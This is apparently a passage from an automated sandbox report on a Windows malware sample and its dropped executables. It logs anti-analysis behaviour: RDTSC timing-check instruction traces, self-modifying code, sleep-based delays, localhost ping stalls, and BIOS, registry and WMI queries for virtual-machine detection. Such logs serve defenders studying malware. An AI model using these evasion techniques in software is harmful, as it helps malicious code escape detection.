                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 3066F8 second address: 30670B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0704B3A496h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop esi 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRDTSC instruction interceptor: First address: 30670B second address: 30672B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F0704B35545h 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BB04B6 second address: 4BB04BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BB04BA second address: 4BB04CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3553Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BB04CD second address: 4BB0515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A4A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b pushad 0x0000000c push eax 0x0000000d push ebx 0x0000000e pop esi 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007F0704B3A4A2h 0x00000018 add ah, 00000028h 0x0000001b jmp 00007F0704B3A49Bh 0x00000020 popfd 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BB0515 second address: 4BB056C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0704B35548h 0x00000008 and ah, FFFFFF88h 0x0000000b jmp 00007F0704B3553Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 call 00007F0704B35539h 0x00000019 jmp 00007F0704B35546h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov bx, si 0x00000025 movzx esi, di 0x00000028 popad 0x00000029 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BB056C second address: 4BB058A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1893B1D7h 0x00000008 push ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ax, 22E1h 0x00000018 mov eax, 43DA0C1Dh 0x0000001d popad 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BB058A second address: 4BB05B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35543h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0704B35544h 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BB05B9 second address: 4BB05E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3A49Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0704B3A4A4h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BB05E2 second address: 4BB065C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F0704B35546h 0x0000000f call 00007F0704B35539h 0x00000014 pushad 0x00000015 mov si, 612Dh 0x00000019 pushfd 0x0000001a jmp 00007F0704B3553Ah 0x0000001f sbb si, 1DC8h 0x00000024 jmp 00007F0704B3553Bh 0x00000029 popfd 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d mov ebx, 008F0B6Ah 0x00000032 popad 0x00000033 mov eax, dword ptr [esp+04h] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F0704B35549h 0x00000040 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BB065C second address: 4BB0660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BB0660 second address: 4BB0666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BB0666 second address: 4BB066C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BB066C second address: 4BB0670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: 4BB0670 second address: 4BB0699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F0704B3A4A5h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSpecial instruction interceptor: First address: 9AEB20 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSpecial instruction interceptor: First address: 9AEA79 instructions caused by: Self-modifying code
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSpecial instruction interceptor: First address: BD48AC instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 18EB20 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 18EA79 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 3B48AC instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeSpecial instruction interceptor: First address: 473CF1 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeSpecial instruction interceptor: First address: 473D86 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeSpecial instruction interceptor: First address: 61FC0D instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeSpecial instruction interceptor: First address: 6AD456 instructions caused by: Self-modifying code
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\PING.EXE ping -n 5 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 5 localhost
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeMemory allocated: 20E81460000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeMemory allocated: 20E997A0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeMemory allocated: 1890000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeMemory allocated: 35B0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeMemory allocated: 18F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\System32\regsvr32.exeMemory allocated: 2380000 memory reserve | memory write watch
                              Source: C:\Windows\System32\regsvr32.exeMemory allocated: 1A720000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeCode function: 0_2_04C00B68 rdtsc 0_2_04C00B68
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 180000
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 1199062
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 599172
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 939Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1321Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 436Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1048Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1406Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1408Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeWindow / User API: threadDelayed 2637Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeWindow / User API: threadDelayed 7161Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeWindow / User API: foregroundWindowGot 1765Jump to behavior
                              Source: C:\Windows\System32\regsvr32.exeWindow / User API: threadDelayed 9440
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7867
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7875
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7643
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MEEGL.tmp\_isetup\_isdecmp.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\is-6JNF1.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\9mpr_8.ocx (copy)Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MEEGL.tmp\_isetup\_shfoldr.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-DKJ0H.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2HFGI.tmp\_isetup\_shfoldr.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MEEGL.tmp\_isetup\_setup64.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2HFGI.tmp\_isetup\_setup64.tmpJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2HFGI.tmp\_isetup\_isdecmp.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3816Thread sleep count: 33 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3816Thread sleep time: -66033s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3304Thread sleep count: 939 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3304Thread sleep time: -1878939s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4240Thread sleep count: 1321 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4240Thread sleep time: -2643321s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164Thread sleep count: 436 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164Thread sleep time: -13080000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6972Thread sleep time: -540000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2580Thread sleep count: 1048 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2580Thread sleep time: -2097048s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3820Thread sleep count: 1406 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3820Thread sleep time: -2813406s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6024Thread sleep count: 1408 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6024Thread sleep time: -2817408s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe TID: 7188Thread sleep count: 43 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe TID: 7188Thread sleep count: 97 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe TID: 7188Thread sleep count: 174 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe TID: 7188Thread sleep count: 174 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe TID: 7188Thread sleep count: 212 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe TID: 7188Thread sleep count: 178 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe TID: 7188Thread sleep time: -600000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe TID: 1872Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe TID: 1864Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe TID: 764Thread sleep time: -90000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe TID: 3276Thread sleep time: -30000s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 5432Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 5432Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -20291418481080494s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -240000s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59874s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59765s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59655s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59547s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59437s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59328s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59217s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59109s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -118000s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -58890s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -58781s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -58671s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -58562s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -58452s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -58343s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -58234s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -58124s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -58015s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -57906s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -57796s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -57687s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -57578s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -57468s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -57359s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -57250s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -57137s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -57016s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 5432Thread sleep time: -540000s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59890s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59781s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59670s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59563s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59438s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59313s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59188s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -1199062s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59671s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59562s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59453s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59343s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59198s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -59090s >= -30000s
                              Source: C:\Windows\System32\regsvr32.exe TID: 3628Thread sleep time: -599172s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1808Thread sleep count: 7867 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5888Thread sleep time: -4611686018427385s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5408Thread sleep count: 7875 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -5534023222112862s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6620Thread sleep count: 7643 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep time: -5534023222112862s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5712Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeFile opened: PHYSICALDRIVE0Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeThread delayed: delay time: 922337203685477Jump to behavior
